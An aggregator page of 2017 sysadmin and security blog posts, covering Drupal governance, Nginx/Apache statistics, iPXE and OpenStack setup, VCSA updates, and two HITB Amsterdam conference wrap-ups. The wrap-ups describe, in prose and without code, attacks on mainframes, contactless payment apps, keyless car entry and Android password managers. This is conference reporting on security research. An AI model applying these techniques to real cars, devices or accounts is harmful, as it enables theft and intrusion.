Quantcast
Channel: Planet Grep
Viewing all 4959 articles
Browse latest View live

Dries Buytaert: Next steps for evolving Drupal's governance

$
0
0

The last time we made significant changes to our governance was 4 to 5 years ago [1, 2, 3]. It's time to evolve it more. We need to:

  • Update the governance model so governance policies and community membership decisions are not determined by me or by me alone. It is clear that the current governance structure of Drupal, which relies on me being the ultimate decision maker and spokesperson for difficult governance and community membership decisions, has reached its limits. It doesn't work for many in our community -- and frankly, it does not work for me either. I want to help drive the technical strategy and vision of Drupal, not be the arbiter of governance or interpersonal issues.
  • Review our the Code of Conduct. Many have commented that the intentions and scope of the Code of Conduct are unclear. For example, some people have asked if violations of the Code of Conduct are the only reasons for which someone might be removed from our community, whether Community Working Group decisions can be made based on actions outside of the Drupal community, or whether we need a Code of Conduct at all. These are all important questions that need clear answers.

I believe that to achieve the best outcome, we will:

  1. Organize both in-person and virtual roundtables during and after DrupalCon Baltimore to focus on gathering direct feedback from the community on evolving our governance.
  2. Refocus the 2-day meeting of the Drupal Association's Board of Directors at DrupalCon Baltimore to discuss these topics.
  3. Collect ideas in the issue queue of the Drupal Governance project. We will share a report from the roundtable discussions (point 1) and the Drupal Association Board Meeting (point 2) in the issue queue so everything is available in one place.
  4. Actively solicit help from experts on diversity, inclusion, experiences of marginalized groups, and codes of conduct and governance. This could include people from both inside and outside the Drupal community (e.g. a leader from another community who is highly respected). I've started looking into this option with the help of the Drupal Association and members of the Community Working Group. We are open to suggestions.

In order to achieve these aims, we plan to organize an in-person Drupal Community Governance sprint the weeks following DrupalCon Baltimore, involving members of the Drupal Association, Community Working Group, the Drupal Diversity & Inclusion group, outside experts, as well as some community members who have been critical of our governance. At the sprint, we will discuss feedback gathered by the roundtables, as well as discussions during the 2-day board meeting at DrupalCon Baltimore, and turn these into concrete proposals: possible modifications to the Code of Conduct, structural changes, expectations of leadership, etc. These proposals will be open for public comment for several weeks or months, to be finalized by DrupalCon Vienna.

We're still discussing these plans but I wanted to give you some insight in our progress and thinking; once the plans are finalized we'll share them on Drupal.org. Let us know your thoughts on this framework. I'm looking forward to working on solutions with others in the community.


Frank Goossens: Autoptimize 2.2 coming your way, care to test?

$
0
0

So work on Autoptimize 2.2 is almost finished and I need your help testing this version before releasing (targeting May, but that depends on you!). The more people I have testing, the faster I might be able to push this thing out and there’s a lot to look forward to;

  • New option: enable/ disable AO for logged in users for all you pagebuilders out there
  • New minification/ caching system, significantly speeding up your site for non-cached pages (previously part of a power-up)
  • Switched to rel=preload + Filamentgroup’s loadCSS for CSS deferring
  • Additional support for HTTP/2 setups (no GUI, you might need to have a look at the API to see/ use all possibilities)
  • Important improvements to the logic of which JS/ CSS can be optimized (getPath function) increasing reliability of the aggregation process
  • Updated to a newer version of the CSS Minification component (albeit not the 3.x one, which seems a tad too fresh and which would require me to drop support for PHP 5.2 which will come but just not yet)
  • API: Lots of extra filters, making AO (even) more flexible.
  • Lots of bugfixes and smaller improvements (see GitHub commit log)

So if you want to help:

  1. Download the zip-file from Github
  2. Overwrite the contents of wp-content/plugins/autoptimize with the contents of autoptimize-master from the zip
  3. Test and if any bug (regression) create an issue in GitHub (if it doesn’t exist already).

Very much looking forward to your feedback!

Mattias Geniar: Nginx might have 33% market share, Apache isn’t falling below 50%

$
0
0

The post Nginx might have 33% market share, Apache isn’t falling below 50% appeared first on ma.ttias.be.

This is a response to a post published by W3 Techs titled "Nginx reaches 33.3% web server market share while Apache falls below 50%". It's gotten massive upvotes on Hacker News, but I believe it's a fundamentally flawed post.

Here's why.

How server adoption is measured

Let's take a quick moment to look at how W3 Techs can decide if a site is running Apache vs. Nginx. The secret lies in the HTTP headers the server sends on each response.

$ curl -I https://ma.ttias.be 2>/dev/null | grep 'Server:'
Server: nginx

That Server header is collected by W3 Techs and they draw pretty graphs from it.

Cool!

Except, you can't rely on the Server alone for these statistics and claims.

You (often) can't hide the Nginx Server header

Nginx is most often used as a reverse proxy, for TLS, load balancing and HTTP/2. That's a part the article to right.

Nginx is the leading web servers supporting some the the more modern protocols, which is probably one of the reasons why people start using it. 76.8% of all sites supporting HTTP/2 use Nginx, while only 2.3% of those sites rely on Apache.

Yes, Nginx offers functionality that's either unstable or hard to get on Apache (ie: not on versions in current repositories).

As a result, Nginx is often deployed like this;

: 443 Nginx
|-> proxy to Apache

:80 Nginx
|-> forward traffic from HTTP -> HTTPs

To the outside world, Nginx is the only HTTP(s) server available. Since measurements of this stat are collected via the Server header, you get this effect.

: 443 Nginx
|- HTTP/1.1 200 OK
|- Server: nginx
|- Cache-Control: max-age=600
|- ...
\
 \
  \ Apache
   |- HTTP/1.1 200 OK
   |- Server: Apache
   |- Cache-Control: max-age=600

Both Apache and Nginx generate the Server header, but Nginx replaces that header with its own as it sends the request to the client. You never see the Apache header, even though Apache is involved.

For instance, here's my website response;

$ curl -I https://ma.ttias.be 2>/dev/null | grep 'Server:'
Server: nginx

Spoiler: I use Nginx as an HTTP/2 proxy (in Docker) for Apache, which does all the heavy lifting. That header only tells you my edge is Nginx, it doesn't tell you what's behind it.

And since Nginx is most often deployed at the very edge, it's the surviving Server header.

Nginx supplements Apache

Sure, in some stacks, Nginx completely replaced Apache. There are clear benefits to do so. But a few years ago, many sysadmins & devs changed their stack from Apache to Nginx, only to come back to Apache after all.

This created a series of Apache configurations that learned the good parts from Nginx, while keeping the flexibility of Apache (aka: .htaccess). Turns out, Nginx forced a wider use of PHP-FPM (and other runtimes), that were later used in Apache as well.

A better title for the original article would be: Nginx runs on 33% of top websites, supplementing Apache deployments.

This is one of those rare occasions where 1 + 1 != 2. Nginx can have 33% market share and Apache can have 85% market share, because they're often combined on the same stack. Things don't have to add up to 100%.

The post Nginx might have 33% market share, Apache isn’t falling below 50% appeared first on ma.ttias.be.

Claudio Ramirez: Post-it: how to revive X on Ubuntu after nvidia kills it

$
0
0

I am not a hug fan of the Linux Nvidia drivers*, but once in a while I try them to check the performance of the machine. More often than not, I end up in a console and no X/Wayland.

I have seen some Ubuntu users reinstalling their machine after this f* up, so here my notes to fix it (I always forget the initramfs step and end up wasting a lot of time):

$ sudo apt-get remove --purge nvidia-*
$ sudo mv /etc/X11/xorg.conf /etc/X11/xorg.conf_pre-nvidia
$ sudo update-initramfs -u
$ reboot

*: I am not a fan of the Windows drivers either now that Nvidia decided to harvest emails and track you if you want updates.


Filed under: Uncategorized Tagged: driver, fix, nvidia, post-it, Ubuntu

Frank Goossens: Autoptimize reaches 300K active installs!

Fabian Arrotin: Remotely kicking a CentOS install through ligthweight 1Mb iso image

$
0
0

As a sysadmin, you probably deploy your bare-metal nodes through kickstarts in combination with pxe/dhcp. That's the most convenient way to deploy nodes in an existing environment. But what about having to remotely init a new DC/environement, without anything at all ? Suppose that you have a standalone node that you have to deploy, but there is no PXE/Dhcp environment configured (yet).

The simple solution would be to , as long as you have at least some kind of management/out-of-band network, to either ask the local DC people to burn the CentOS Minimal iso image on a usb stick, or other media. But I was in a need to deploy a machine without any remote hand available locally there to help me. The only things I had were :

  • access to the ipmi interface of that server
  • the fixed IP/netmask/gateway/dns settings for the NIC connected to that segment/vlan

One simple solution would have been to just "attach" the CentOS 7 iso as a virtual media, and then boot the machine, and setup from "locally emulated" cd-rom drive. But that's not something I wanted to do, as I didn't want to slow the install, as that would come from my local iso image, and so using my "slow" bandwidth. Instead, I directly wanted to use the Gbit link from that server to kick the install. So here is how you can do it with ipxe.iso. Ipxe is really helpful for such thing. The only "issue" was that I had to configure the nic first with Fixed IP (remember ? no dhcpd yet).

So, download the ipxe.iso image, add it as "virtual media" (and transfer will be fast, as that's under 1Mb), and boot the server. Once it boots from the iso image, don't let ipxe run, but instead hit CTRL/B when you see ipxe starting . Reason is that we don't want to let it starting the dhcp discover/offer/request/ack process, as we know that it will not work.

You're then presented with ipxe shell, so here we go (all parameters are obviously to be adapted, including net adapter number) :

set net0/ip x.x.x.x
set net0/netmask x.x.x.x
set net0/gateway x.x.x.x
set dns x.x.x.x

ifopen net0
ifstat

From that point you should have network connectivity, so we can "just" chainload the CentOS pxe images and start the install :

initrd http://mirror.centos.org/centos/7/os/x86_64/images/pxeboot/initrd.img
chain http://mirror.centos.org/centos/7/os/x86_64/images/pxeboot/vmlinuz net.ifnames=0 biosdevname=0 ksdevice=eth2 inst.repo=http://mirror.centos.org/centos/7/os/x86_64/ inst.lang=en_GB inst.keymap=be-latin1 inst.vnc inst.vncpassword=CHANGEME ip=x.x.x.x netmask=x.x.x.x gateway=x.x.x.x dns=x.x.x.x

Then you can just enjoy your CentOS install running all from network, and so at "full steam" ! You can also combine directly with inst.ks= to have a fully automated setup. Worth knowing that you can also regenerate/build an updated/customized ipxe.iso with those scripts directly too. That's more or less what we used to also have a 1Mb universal installer for CentOS 6 and 7, see https://wiki.centos.org/HowTos/RemoteiPXE , but that one defaults to dhcp

Hope it helps

Philip Van Hoof: Asynchronous undoable and redoable APIs

$
0
0

Combining QFuture with QUndoCommand made a lot of sense for us. The undo and the redo methods of the QUndoCommand can also be asynchronous, of course. We wanted to use QFuture without involving threads, because our asynchronosity is done through a process and IPC, and not a thread. It’s the design mistake of QtConcurrent‘s run method, in my opinion. That meant using QFutureInterface instead (which is undocumented, but luckily public – so it’ll remain with us until at least Qt’s 6.y.z releases).

So how do we make a QUndoCommand that has a undo, and that has a redo method that returns a asynchronous QFuture<ResultType>?

We just did that, today. I’m very satisfied with the resulting API and design. It might have helped if QUndoStack would be a QUndoStack<T> and QUndoCommand would have been a QUndoCommand<T> with undo and redo’s return type being T. Just an idea for the Qt 6.y.z developers.

I’m not telling you today, because I want this to settle in our project first. I’m sure we will find problems.

Xavier Mertens: HITB Amsterdam 2017 Day #1 Wrap-Up

$
0
0

I’m back in Amsterdam for the 8th edition of the security conference Hack in the Box. Last year, I was not able to attend but I’m attending it for a while (you can reread all my wrap-up’s here). What to say? It’s a very strong organisation, everything running fine, a good team dedicated to attendees. This year, the conference was based on four(!) tracks: two regular ones, one dedicated to more “practical” presentations (HITBlabs) and the last one dedicated to small talks (30-60 mins).

Elly van den Heuvel opened the conference with a small 15-minutes introduction talk: “How prepared we are for the future?”. Elly works for the Dutch government as the “Cyber Security Council“. She gave some facts about the current security landscape from the place of women in infosec (things are changing slowly) to the message that cyber-security is important for our security in our daily life. For Elly, we are facing a revolution as big as the one we faced with the industrial revolution, maybe even bigger. Our goal as information security professional is to build a cyber security future for the next generations. They are already nice worldwide initiatives like the CERT’s or NIST and their guidelines. In companies, board members must take their responsibilities for cyber-security projects (budgets & times must be assigned to them). Elly declared the conference officially open 🙂

The first-day keynote was given by Saumil Shah. The title was “Redefining defences”. He started with a warning: this talk is disrupting and… it was! Saumil started with a step by to the past and how security/vulnerabilities evolved. It started with servers and today people are targeted. For years, we have implemented several layers of defence but with the same effect: all of them can be bypassed. Keep in mind that there will be always new vulnerabilities because products and applications have more and more features, are becoming more complex. I really liked the comparison with the Die Hard movie: It’s the Nakatomi building: we can walk through all the targets exactly in the movie when Bruce Willis travels in the building. Vendors invent new technologies to mitigate the exploits. There was a nice reference to the “Mitigator“. The next part of the keynote was focusing how the CISO daily job and the fight against auditors. A fact: “compliance is not security”. In 2001, the CIO position was split in CIO & CISO but budgets remained assigned to the CIA as “business enabler”. Today, we should have another split: The CISO position must be divided in CISO and COO (Compliance Officer). His/her job is to defend against auditors. It was a great keynote but the audience should be more C-level people instead of “technical people” who already agree on all the facts reviewed by Saumil. [Saumil’s slides are available here]

After the first coffee break, I had to choose between two tracks. My first choice was already difficult: hacking femtocell devices or IBM mainframes running z/OS. Even if the second focused on less known environments, mainframes are used in many critical operations so I decided to attend this talk. Ayoub Elaassal is a pentester who focused on this type of targets. People still have an old idea of mainframes. The good old IBM 370 was a big success. Today, the reality is different, modern mainframes are badass computers like the IBM zEC 13: 10TB of memory, 141 processors, cryptographic chips, etc. Who uses such computers? Almost every big companies from airlines, healthcare, insurance or finance ( Have a look at this nice gallery of mainframe consoles). Why? Because it’s powerful and stable. Many people (me first) don’t know a lot about mainframes: It’s not a web app, it uses a 3270 emulator over port 23 but we don’t know how it works. On top of the mainframe OS, IBM has an application layer called CICS (“Customer Information Control System”). For Ayoub, it looks like “a combination of Tomcat & Drupal before it was cool”. CICS is a very nice target because it is used a log: Ayoub gave a nice comparison: worldwide, 1.2M of request/sec are performed using the CICS product while Google reaches 200K requests/sec. Impressive! Before exploiting CICS, the first step was to explain how it works. The mainframe world is full of acronyms. not easy to understand immediately.  But then Ayoub explained how it abused a mainframe. The first attack was to jailbreak the CICS to get a console access (just like finding the admin web page). Mainframes contain a lot of juicy information. The next attack was to read sensitive files. Completed too! So, the next step is to pwn the device. CICS has a feature called “spool” functions. A spool is a dataset (or file) containing the output of a job. Idea: generate a dataset and send it to the job scheduler. Ayoub showed a demo of a Reverse shell in REXX. Like DC trust, you can have the same trust between mainframes and push code to another one. Replace NODE(LOCAL) by NODE(WASHDC). If the spool feature is not enabled, there are alternative techniques that were also reviewed. Finally, let’s to privileges escalation: They are three main levels: Special, Operations and Audit. Special can be considered as the “root” level. Those levels are defined by a simple bit in memory. If you can swap it, you get more privileges. It was the last example. From a novice point of view, this was difficult to follow but basically, mainframes can be compromised like any other computer. The more dangerous aspect is that people using mainframes think that they’re not targeted. Based on the data stored on them, they are really nice targets. All the Ayoub’s scripts are here. [Ayoub’s slides are available here]

The next talk was “Can’t Touch This: Cloning Any Android HCE Contactless Card” by Slawomir Jasek. Cloning things has always been a dream for people. And they succeeded in 1996 with Dolly the sheep. Later, in 2001, scientists make “Copycat”. Today we have also services to clone pets (if you have a lot of money to spend). Even if cloning humans is unethical, it remains a dream. So, we not close also objects? Especially if it can help to get some money. Mobile contactless payment cards are a good target. It’s illegal but bad guys don’t care. Such devices implement a lot of countermeasures but are we sure that they can’t be bypassed? Slawomir explained briefly the HCE technology. So, what are the different ways to abuse a payment application? The first one is of course to stole the phone. We can steal the card data via NFC (but they are already restriction: the phone screen must be turned on). We can’t pay but for motivated people, it should be possible to rebuild the mag stripe. Mobile apps use tokenization. Random card numbers are generated to pay and are used only for such operations. The transaction is protected by encrypted data. So, the next step is to steal the key. Online? Using man-in-the-middle attacks? Not easy. The key is stored on the phone. The key is also encrypted. How to access it? By reversing the app but it has a huge cost. What if we copy data across devices? They must be the same (model, OS, IMEI). We can copy the app + data but it’s not easy for a mass scale attack. The xposed framework helps to clone the device but it requires root access. Root detection is implemented in many apps. Slawomir performed a life demo: He copied data between two mobile phones using shell scripts and was able to make a payment with the cloned device. Note that the payments were performed on the same network and with small amounts of money. Google and banks have strong fraud detection systems. What about the Google push messages used by the application? Cloned devices received both messages but not always (not reliable). Then Slawomir talked about CDCVM which is a verification method that asks the user to give a PIN code but where… on its own device! Some apps do not support it but there is an API and it is possible to patch the application and enable the support (setting it to “True”) via an API call. What about other applications? As usual, some are good while others are bad (ex: some don’t event implement root detection). To conclude, can we prevent cloning? Not completely but we can make the process more difficult. According to Slawomir, the key is also to improve the backend and strong fraud detection controls (ex: based on the behaviour of the user). [Slawomir’s slides are available here]

After the lunch time, my choice was to attend Long Liu’s and Linan Has’s (which was not present) talk. The abstract looked nice: exploitation of the Chakracore core engine. This is a Javascript engine developed by Microsoft for its Edge browser. Today the framework is open source. Why is it a nice target according to the speaker? The source code is freely available, Edge is a nice attack surface. Long explained the different bug they found in the code and they helped them to win a lot of hacking contests. The problem was the monotonous voice of the speaker which just invited to take a small nap. The presentation ended with a nice demo of a web page visited by Edge and popping up a notepad running with system privileges. [Long’s slides are available here]

After the break, I switched to the track four to attend two small talks. But the quality was there! The first one by Patrick Wardle: “Meet and Greet with the MacOS Malware Class of 2016“. The presentation was a cool overview of the malware that targeted the OSX operating system. Yes, OSX is also targeted by malware today! For each of them, he reviewed:

  • The infection mechanism
  • The persistence mechanism
  • The features
  • The disinfection process

The examples covered by Patrick were:

  • Keranger
  • Keydnap
  • FakeFileOpener
  • Mokes
  • Komplex

He also presented some nice tools which could increase the security of your OSX environment. [Patrick’s slides are available here]

The next talk was presented by George Chatzisofroniou and covered a new wireless attach technique called Lure10. Wireless automatic association is not new (the well-known KARMA attack). This technique exists for years but modern operating systems implemented controls against this attack. But MitM attacks remains interesting because most applications do not implement countermeasures. In Windows 10, open networks are not added to the PNL (“Preferred Networks List”).  Microsoft developed a Wi-Fi Sense feature. The Lure10 attack tries to abuse it by making the Windows Location Service think that it is somewhere else and then mimic a Wifi Sence approved local network. In this case, we have an automatic association. A really cool attack that will be implemented in the next release of the wifiphisher phisher framework.  [George’s slides are available here]

My next choice was to attend a talk about sandboxing: “Shadow-Box: The Practical and Omnipotent Sandbox” by Seunghun Han. In short, Shadow-box is a lightweight hypervisor-based kernel protector. A fact: Linux kernels are everywhere today (computers, IoT, cars, etc). The kernel suffers from vulnerabilities and the risk of rootkits is always present. The classic ring (ring 0) is not enough to protect against those threats. Basically, the rootkit changes the system calls table and divert them to it to perform malicious activities.The idea behind Shadow-box is to use the VT technology to help in mitigating those threats. This is called “Ring -1”. Previous researches were already performed but suffered from many issues (mainly performance). The new research insists on lightweight and practical usage. Seunghun explained in detail how it works and ended with a nice demo. He tried to start a rootkit into a Linux kernel that has the Shadow-box module loaded. Detection was immediate and the rootkit not installed. Interesting but is it usable on a day-to-day basis? According to Seunghun, it is. The performance impact on the system is acceptable. [Seughun’ slides are available here]

The last talk of the day focused on TrendMicro products: “I Got 99 Trends and a # is All of Them! How We Found Over 100 RCE Vulnerabilities in Trend Micro Software” by Roberto Suggi Liverani and Steven Seeley. They research started after the disclosure of vulnerabilities. They decided to find more. Why Trendmicro? Nothing against the company but it’s a renowned vendor, they have a bug bounty program and they want to secure their software. The approach followed was to compromise the products without user interaction. They started with low-handing fruits, focused on components like libraries, scripts. The also use the same approach as used in malware analysis: check the behaviour and communications with external services and other components. They reviewed the following products:

  • Smart Protection Server
  • Data Loss Prevention
  • Control Manager
  • Interscan Web Security
  • Threat Discovery Appliance
  • Mobile Security for Enterprise
  • Safesync for Enterprise

The total amount of vulnerabilities they found was so impressive, most of them led to remote code execution. And, for most of them, it was quite trivial. [Roberto’s & Steven’s slides are available here]

This is the end of day #1. Stay tuned for more tomorrow.

 

[The post HITB Amsterdam 2017 Day #1 Wrap-Up has been first published on /dev/random]


Fabian Arrotin: Deploying Openstack PoC on CentOS with linux bridge

$
0
0

I was recently in a need to start "playing" with Openstack (working in an existing RDO setup) so I thought that it would be good idea to have my personal playground to start deploying from scratch/breaking/fixing that playground setup.

At first sight, Openstack looks impressive and "over-engineered", as it's complex and have zillions of modules to make it work. But then when you dive into it, you understand that the choice is yours to make it complex or not. Yeah, that sentence can look strange, but I'll explain you why.

First, you should just write your requirements, and then only have a look at the needed openstack components. For my personal playground, I just wanted to have a basic thing that would let me deploy VMs on demand, in the existing network, and so directly using bridge as I want the VMs to be directly integrated into the existing network/subnet.

So just by looking at the mentioned diagram, we just need :

  • keystone (needed for the identity service)
  • nova (hypervisor part)
  • neutron (handling the network part)
  • glance (to store the OS images that will be used to create the VMs)

Now that I have my requirements and list of needed components, let's see how to setup my PoC ... The RDO project has good doc for this, including the Quickstart guide. You can follow that guide, and as everything is packaged/built/tested and also delivered through CentOS mirror network, you can have a working RDO/openstack All-in-one setup working in minutes ...

The only issue is that it doesn't fit my need, as it will setup unneeded components, and the network layout isn't the one I wanted either, as it will be based on openvswitch, and other rules (so multiple layers I wanted to get rid of). The good news is that Packstack is in fact a wrapper tool around puppet modules, and it also supports lot of options to configure your PoC.

Let's assume that I wanted a PoC based on openstack-newton, and that my machine has two nics : eth0 for mgmt network and eth1 for VMs network. You don't need to configure the bridge on the eth1 interface, as that will be done automatically by neutron. So let's follow the quickstart guide, but we'll just adapt the packstack command line :

yum install centos-release-openstack-newton -y
systemctl disable firewalld
systemctl stop firewalld
systemctl disable NetworkManager
systemctl stop NetworkManager
systemctl enable network
systemctl start network
yum install -y openstack-packstack

Let's fix eth1 to ensure that it's started but without any IP on it :

sed -i 's/BOOTPROTO="dhcp"/BOOTPROTO="none"/' /etc/sysconfig/network-scripts/ifcfg-eth1
sed -i 's/ONBOOT="no"/ONBOOT="yes"/' /etc/sysconfig/network-scripts/ifcfg-eth1
ifup eth1

And now let's call packstack with the required option so that we'll use basic linux bridge (and so no openvswitch), and we'll instruct that it will have to use eth1 for that mapping

packstack --allinone --provision-demo=n --os-neutron-ml2-type-drivers=flat --os-neutron-ml2-mechanism-drivers=linuxbridge --os-neutron-ml2-flat-networks=physnet0 --os-neutron-l2-agent=linuxbridge --os-neutron-lb-interface-mappings=physnet0:eth1 --os-neutron-ml2-tenant-network-types=' ' --nagios-install=n 

At this stage we have openstack components installed, and /root/keystonerc_admin file that we can source for openstack CLI operations. We have instructed neutron to use linuxbridge, but we haven't (yet) created a network and a subnet tied to it, so let's do that now :

source /root/keystonerc_admin
neutron net-create --shared --provider:network_type=flat --provider:physical_network=physnet0 othernet
neutron subnet-create --name other_subnet --enable_dhcp --allocation-pool=start=192.168.123.1,end=192.168.123.4 --gateway=192.168.123.254 --dns-nameserver=192.168.123.254 othernet 192.168.123.0/24

Before import image[s] and creating instances, there is one thing left to do : instruct dhcp_agent that metadata for cloud-init inside the VM will not be served from traditional "router" inside of openstack. And also don't forget to let traffic (in/out) pass through security group (see doc)

Just be sure to have enable_isolated_metadata = True in /etc/neutron/dhcp_agent.ini and then systemctl restart neutron-dhcp-agent : and from that point, cloud metadata will be served from dhcp too.

From that point you can just follow the quickstart guide to create projects/users, import images, create instances and/or do all this from cli too

One last remark with linuxbridge in an existing network : as neutron will have a dhcp-agent listening on the bridge, the provisioned VMs will get an IP from the pool declared in the "neutron subnet-create" command. However (and I saw that when I added other compute nodes in the same setup), you'll have a potential conflict with an existing dhcpd instance on the same segment/network, so your VM can potentially get their IP from your existing dhcpd instance on the network, and not from neutron. As a workaround, you can just ignore the mac addresses range used by openstack, so that your VMs will always get their IP from neutron dhcp. To do this, there are different options, depending on your local dhcpd instance :

  • for dnsmasq : dhcp-host=fa:16:3e:::*,ignore (see doc)
  • for ISC dhcpd : "ignore booting" (see doc)

The default mac addresses range for openstack VMs is indeed fa:16:3e:00:00:00 (see /etc/neutron/neutron.conf, so that can be changed too)

Those were some of my findings for my openstack PoC/playground. Now that I understand a little bit more all this, I'm currently working on some puppet integration for this, as there are official openstack puppet modules available on git.openstack.org that one can import to deploy/configure openstack (and better than using packstack). But lot of "yaks to shave" to get to that point, so surely for another future blog post.

Bert de Bruijn: Updating VCSA on a private network

$
0
0
Updating the VCSA is easy when it has internet access or if you can mount the update iso. On a private network, VMware assumes you have a webserver that can serve up the updaterepo files. In this article, we'll look at how to proceed when VCSA is on a private network where internet access is blocked, and there's no webserver available. The VCSA and PSC contain their own webserver that can be used for an HTTP based update. This procedure was tested on PSC/VCSA 6.0.

Follow these steps:


  • First, download the update repo zip (e.g. for 6.0 U3A, the filename is VMware-vCenter-Server-Appliance-6.0.0.30100-5202501-updaterepo.zip ) 
  • Transfer the updaterepo zip to a PSC or VCSA that will be used as the server. You can use Putty's pscp.exe on Windows or scp on Mac/Linux, but you'd have to run "chsh -s /bin/bash root" in the CLI shell before using pscp.exe/scp if your PSC/VCSA is set up with the appliancesh. 
    • chsh -s /bin/bash root
    • "c:\program files (x86)\putty\pscp.exe" VMware*updaterepo.zip root@psc-name-or-address:/tmp 
  • Change your PSC/VCSA root access back to the appliancesh if you changed it earlier: 
    • chsh -s /bin/appliancesh root
  • Make a directory for the repository files and unpack the updaterepo files there:
    • mkdir /srv/www/htdocs/6u3
    • chmod go+rx /srv/www/htdocs/6u3
    • cd /srv/www/htdocs/6u3
    • unzip /tmp/VMware-vCenter*updaterepo.zip
    • rm /tmp/VMware-vCenter*updaterepo.zip
  • Create a redirect using the HTTP rhttpproxy listener and restart it
    • echo "/6u3 local 7000 allow allow"> /etc/vmware-rhttpproxy/endpoints.conf.d/temp-update.conf 
    • /etc/init.d/vmware-rhttpproxy restart 
  • Create a /tmp/nginx.conf (I didn't save mine, but "listen 7000" is the key change from the default)
  • Start nginx
    • nginx -c /tmp/nginx.conf
  • Start the update via the VAMI. Change the repository URL in settings,  use http://psc-name-or-address/6u3/ as repository URL. Then use "Check URL". 
  • Afterwards, clean up: 
    • killall nginx
    • cd /srv/www/htdocs; rm -rf 6u3


P.S. I personally tested this using a PSC as webserver to update both that PSC, and also a VCSA appliance.
P.P.S. VMware released an update for VCSA 6.0 and 6.5 on the day I wrote this. For 6.0, the latest version is U3B at the time of writing, while I updated to U3A.

Xavier Mertens: HITB Amsterdam 2017 Day #2 Wrap-Up

$
0
0

After a nice evening with some beers and an excellent dinner with infosec peers, here is my wrap-up for the second day. Coffee? Check! Wireless? Check! Twitter? Check!

As usual, the day started with a keynote. Window Snyder presented “All Fall Down: Interdependencies in the Cloud”. Window is the CSO of Fastly and, as many companies today, Fasly relies on many services running in the cloud. This reminds me the Amazon S3 outage and their dashboard that was not working because it was relying on… S3! Today, all the stuff are interconnected and the overall security depends on the complete chain. To resume: You use a cloud service to store your data, you authenticate to it using another cloud service, and you analyse your data using a third one etc… If one is failing, we can face a domino effect. Many companies have statements like “We take security very seriously” but they don’t invest. Window reviewed some nightmare stories where the security completely failed like the RSA token compromization in 2011, Diginotar in 2012 or Target in 2013. But sometimes dependencies are very simple like DNS… What if your DNS is out of service? All your infrastructure is down. DNS remains an Achille’s heel for many organizations. The keynote interesting but very short! Anyway, it meant more time for coffee…

The first regular talk was maybe the most expected: “Chasing Cars: Keyless Entry System Attacks”. The talk was promoted via social networks before the conference. I was really curious and not disappointed by the result of the research! Yingtao Zeng, Qing Yang & Jun Li presented their work about car keyless attack. It was strange that the guy responsible of the most part of the research did not speak English. I was speaking in Chinese to his colleague who was translating in English. Because users are looking for more convenience (and because it’s “cool”), modern cars are not using RKE (remote keyless entry) but PKE (passive keyless entry). They started with a technical description of the technology that many of us use daily:

Passive key entry system

How to steal the car? How could we use the key in the car owner’s pocket? The idea was to perform a relay attack. The signal of the key is relayed from the owner’s pocket to the attacker sitting next to the car. Keep in mind that cars required to press the button on the door or to use a contact sensor to enable communications with the key. A wake up is sent to the key and unlock doors. The relay attack scenario looks like this:

Relay attack scenario

During this process, they are time constraints. They showed a nice demo of a guy leaving his car, followed by attacker #1 who captures the signal and relay to the attack #2 who unlock the car.

Relay devices

The current range to access the car owner’s key is ~2m. Between the two relays, up to 300m! What about the cost to build the devices? Approximatively 20€! (the cost of the main components). What in real case? Once the car is stolen and the engine running, it will only warn that the key is not present but it won’t stop! The only limit is running out of gas 🙂 Countermeasures are: use a faraday cage or bag, remove the battery more strict timing constraints.

They are still improving the research and are now investigating how to relay this signal through TCP/IP (read: the Wild internet). [Slides are available here]

My next choice was to follow “Extracting All Your Secrets: Vulnerabilities in Android Password Managers” presented by Stephan Uber, Steven Arzt and Siegfried Rasthofer. Passwords remain a threat for most people. For years, we ask users to use strong passwords, to change them regularly. The goal was not here to debate about how passwords must be managed but, as we recommend users to use passwords manager to handle the huge amount of passwords, are they really safe? An interesting study demonstrated that, on average, users have to deal with 90 passwords. The research focused on Android applications. First of all, most of them say that they “banking level” or “military grade” encryption? True or false? Well, encryption is not the only protection for passwords. Is it possible to steal them using alternative attack scenarios? Guess what? They chose the top password managers by the number of downloads on the Google play store. They all provide standard features like autofill, custom browser, comfort features, secure sync and confidential password storage of course. (Important note: all the attacks have been performed on non-rooted devices) Manual filing attack: Manual filling is using the clipboard. 1st problem: any app can read from the clipboard without any specific rights. A clipboard sniffer app could be useful.

The first attack scenario was: Manual filing attack: Manual filling is using the clipboard. First problem: any application can read from the clipboard without any specific rights. A clipboard sniffer app could be useful to steal any password. The second scenario was: Automatic filling attack. How does it work? Applications cannot communicate due to the sandboxing system. They have to use the “Accessibility service” (normally used for disabled people). The issue may arise if the application doesn’t check the complete app name. Example: make an app that starts also with “com.twitter” like “com.twitter.twitterleak”. The next attack is based on the backup function. Backup, convert the backup to .tar, untar and get the master password in plain text in KeyStorage.xml. Browsers don’t provide API’s to perform autofill so developers create a customer browser. But it’s running in the same sandbox. Cool! But can we abuse this? Browsers are based on Webview API which supports access to files… file:///data/package/…./passwords_pref.xml Where is the key? In the source code, split in two 🙂 More fails reported by the speakers:

  • Custom crypto (“because AES isn’t good enough?”)
  • AES used in ESC mode for db encryption
  • Delivered browsers to not consider subdomains in form fields
  • Data leakage in browsers
  • Customer transport security

How to improve the security of password managers:

  • Android provides a keystore, use it!
  • Use key derivation function
  • Avoid hardcoded keys
  • Do not abuse the account manager

The complete research is available here. [Slides are available here]

After the lunch, Antonios Altasis presented “An Attack-in-Depth Analysis of Multicast DNS and DNS Service Discovery”. The objective was to perform threat analysis and to release a tool to perform tests on a local network. The starting point was the RFC and identifying the potential risks. mDNS & DNS-SD are used for zero-conf networking. They are used by the AppleTV, the Google ChromeCast, home speakers, etc. mDNS (RFC6762) provides DNS-alike operations but on the local network (uses 5353). DNS-SD (RFC6763) allows clients to discover instances of a specific service (using standard DNS queries). mDNS uses the “.local” TLD via 224.0.0.251 & FF02::FB. Antonios make a great review of the problems associated with these protocols. The possible attacks are:

  • Reconnaissance (when you search for a printer, all the services will be returned, this is useful to gather information about your victim. Easy to get info without scanning). I liked this.
  • Spoofing
  • DoS
  • Remote unicast interaction

mDNS implementation can be used to perform a DoS attack from remote locations. If most modern OS are protected, some embedded systems still use vulnerable Linux implementations. Interesting: Close to 1M of devices are listening to port 5353 on the Internet (Shodan). Not all of them are vulnerable but there are chances. During the demos, Antonios used the tool he developed: pholus.py. [Slides are available here]

